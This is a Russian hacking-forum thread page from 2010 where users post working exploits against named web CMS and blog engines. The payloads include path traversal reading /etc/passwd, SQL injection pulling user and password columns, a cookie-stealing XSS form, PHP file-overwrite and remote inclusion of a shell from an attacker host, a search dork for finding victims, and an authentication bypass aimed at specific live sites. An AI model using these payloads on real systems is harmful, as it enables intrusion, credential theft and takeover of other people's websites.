ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PhpMySport
  #391  
Старый 12.05.2010, 22:03
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию PhpMySport

PhpMySport
Site: phpmysport.sourceforge.net
Vulnerability: Local Files Include
Severity: High
Needs: magic_quotes=Off (or null-byte alternative)
Exploit: /index.php?lg=/../../../../../../../../../etc/passwd%00
Reason: В index.php есть строчки:
PHP код:
... 
/************************/ 
/* LANGUAGE MANAGEMENT  */ 
/************************/ 
if(!@include_once(create_path("include/lg_general_".LANG.".php"))) 

 echo 
"ERREUR : Language not supported/Langue non supportИe"
 exit(); 

... 
Константа LANG определяется в config.php и изначально берётся из get-параметра lg. Таким образом, мы можем написать слеш /, тем самым закрыв директорию, затем подняться вверх, расширение отрезать нулл-байтом.
Если не удаётся заинклудить, вылезает ошибка "ERREUR : Language not supported/Langue non supportИe". Вывод php-ошибок отключён.
Example: На официальном сайте http://phpmysport.sourceforge.net/demo/index.php?lg=/../../../../../../../../../etc/passwd%00&skin=defaut

Последний раз редактировалось shell_c0de; 12.05.2010 в 22:10..
 
Ответить с цитированием

  #392  
Старый 16.05.2010, 14:02
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Strawberry 1.1.1 (Он же когда-то CuteNews)
Пассивная XSS:
Цитата:
/example/index.php?do=abcd{abcd}body{background-image:%20url(javascript:alert());}
Arctic Fox CMS v0.9.4

SQL Inj
Цитата:
/index.php?page=abcd%22+union+select+1,2+--+

Последний раз редактировалось Ctacok; 15.06.2010 в 08:03..
 
Ответить с цитированием

  #393  
Старый 26.05.2010, 19:14
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

WebAsyst

Dork: - inurl:index.php?ukey=news&blog_id=

Exploit: - http://site.com/index.php?ukey=news&blog_id=(select+1+from+(select +count(0),concat((select+version()),floor(rand(0)* 2))+from+SC_news_table+group+by+2+limit+1)a)--+

4.1<=MySql=>5
 
Ответить с цитированием

  #394  
Старый 27.05.2010, 20:43
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Программа: razorCMS 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content" сценарием admin/index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

Код:
<form action="http://example.com/admin/?action=edit&slab=home" method="post" name="main" >
<input type="hidden" name="title" value="Home" />
<input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' />
<input type="hidden" name="ptitle" value="" />
<input type="hidden" name="theme" value="theme-default" />
<input type="hidden" name="check_sidebar" value="sidebar" />
<input type="hidden" name="save" value="Save Content" />
</form>
<script>
document.main.submit();
</script>
 
Ответить с цитированием

Globber 1.4 PHP Code Execution
  #395  
Старый 31.05.2010, 16:14
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию Globber 1.4 PHP Code Execution

Globber 1.4
Site: https://launchpad.net/globber

PHP Code Execution

Vuln file:
/include/admin/edit.inc.php
PHP код:
if(!$_EXEC){ die; }
if(
$_POST){
  foreach(
$_POST as $key => $val){
    
$f .= '['.$key.']'.stripslashes($val).'[/'.$key.']'."\n";
  }
  if(
$_GET['c']==''){
    
$_GET['c'] = 'misc';
  }
  if(!
is_dir('blog/'.$_GET['c'])){
    
mkdir('blog/'.$_GET['c']);
  }
  
file_put_contents('blog/'.$_GET['c'].'/'.$_GET['a'], $f);
/*...*/ 
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/include/admin/edit.inc.php?c=../../admin&a=rebuild.inc.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

_EXEC=<?php phpinfo();?>
В результате файл rebuild.inc.php перезапишется, и будет иметь содержимое:
Код:
[_EXEC]<?php phpinfo();?>[/_EXEC]
По адресу http://[host]/[path]/include/admin/rebuild.inc.php, любуемся phpinfo
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #396  
Старый 02.06.2010, 01:11
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

LiveStreet 2
XSS активная:
в поле, для комментария, к просьбе добавить в друзья, вставляем:
Код:
"><script>alert();</script>
.
При просмотре сообщения пользователем, код выполнится.
====================================
XSS активная:
добавляем новую запись, и в поле для меток, вставляем:
Код:
"><script>alert();</script>
.
Когда другой пользователь, будет выбирать метки для своего сообщения, код выполнится

Последний раз редактировалось Bb0y; 04.06.2010 в 01:04..
 
Ответить с цитированием

NibbleBlog 2.0 Remote File Inclusion
  #397  
Старый 03.06.2010, 13:12
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию NibbleBlog 2.0 Remote File Inclusion

NibbleBlog 2.0
Site: http://www.nibbleblog.com

Remote File Inclusion

Vuln file: /admin/includes/index_login.php
PHP код:
    if($var_url['exe']=='login')
    {
            
$var_form['login_user'] = (string) $_POST['form_field_user'];
            
$var_form['login_password'] = (string) $_POST['form_field_password'];

            if( !empty(
$var_form['login_user']) && !empty($var_form['login_password']) )
            {
                include(
$_PATH['shadow.php']);
/*...*/ 
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #398  
Старый 07.06.2010, 23:25
Аватар для _iks_
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию

E2 SELECTA
Site: http://blogengine.ru/

Local File Include(0-day ):

./spesta/counter.php
Уязвимый код:

PHP код:
 ...
 if (!isset (
$s_addurl))
 {
  
$z=dirname(__FILE__);
  
$z2=$_SERVER['DOCUMENT_ROOT'].dirname ($_SERVER['PHP_SELF']);
  
$s_addurl=substr ($zstrpos ($z$z2)+strlen($z2));
  if (
$s_addurl!=""$s_addurl.="/";
 }
 else [
COLOR=DarkRed]$s_addurl=str_replace (":",""$s_addurl);[/COLOR]

 include (
$s_addurl."func.php");
 ... 
Exploit:

Как видно из нашей переменной вырезается двоеточие, поэтому теоретически имеем только локальный инклуд, однако нам на руку то, что движок ведёт своеобразный журнал по адресу ./spesta/data/, в частности в файл requests.php записывается запрошенный URL, и ничто не мешает указать в нём например <?php phpinfo();?>, поэтому сначала обращаемся к какой-нибудь страницe добавив к URL-адресу наш php-код, а затем инклудим вот так:

Код:
./spesta/counter.php?s_addurl=data/request.txt%00
Также можно внести код в agents.txt(логируются юзерагенты).

Примечание:

для этой уязвимости не играет роли значение register_globals, так как в .htacess эта настройка взводится, однако на всякий случай я решил уведомить об этом.


Содержимое .htacess:

Код:
RewriteEngine Off
DirectoryIndex index.php
Options -Indexes -MultiViews
ErrorDocument 403 /stat/deny.php
<IfModule mod_php4.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
<IfModule mod_php5.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>

Последний раз редактировалось _iks_; 13.06.2010 в 11:27..
 
Ответить с цитированием

  #399  
Старый 09.06.2010, 23:44
Аватар для _iks_
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию

KaRoman CMS
http://sourceforge.net/projects/karoman/


SQL-инъекция(mq == off):
./view_article.php?id=0'+union+select+1,concat(user, 0x3a,pass),3,4,5,6,7,8+FROM+userlist--+


PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT * FROM articles WHERE id='$id'",$db); // Выбираем нужные таблицы

... 

SQL-иньекция(права администратора):
./admin/settings.php?id=100500+union+select+1,2,3,4,5,6


PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT title,id FROM settings");      

... 
SQL-иньекция(права администратора):
./admin/edit_art.php?id=100500+union+select+1,2,3,4,5,6,7, 8

PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT * FROM articles WHERE id=$id");

... 
 
Ответить с цитированием

  #400  
Старый 14.06.2010, 12:12
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Ov3rLo1d[-]Invisible
http://wowjp.net/forum/61-15808-1

/admin/index.php
PHP код:
...

if (!isset(
$HTTP_POST_VARS["submitloginform"]) && (($HTTP_COOKIE_VARS['userlogged'] == "yes") || ($_SESSION['sessionlogin'] == "yes"))) {

/* Sets $PHPSESSID to the PHPSESSID in the cookie */
$PHPSESSID $HTTP_COOKIE_VARS['userid'];

/* Set $mode to the thingy on the url */
$mode $HTTP_GET_VARS['mode'];

/* Removes the cookie before anything is displayed */
if ($mode == "logout") {
    
session_destroy();
    
setcookie("userlogged"""time()-600);
    
setcookie("userid"""time()-600);
}

... 
Добавляем себе в куки userlogged = yes
Код:
http://shadow-server.ru/admin/

Последний раз редактировалось SeNaP; 14.06.2010 в 22:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ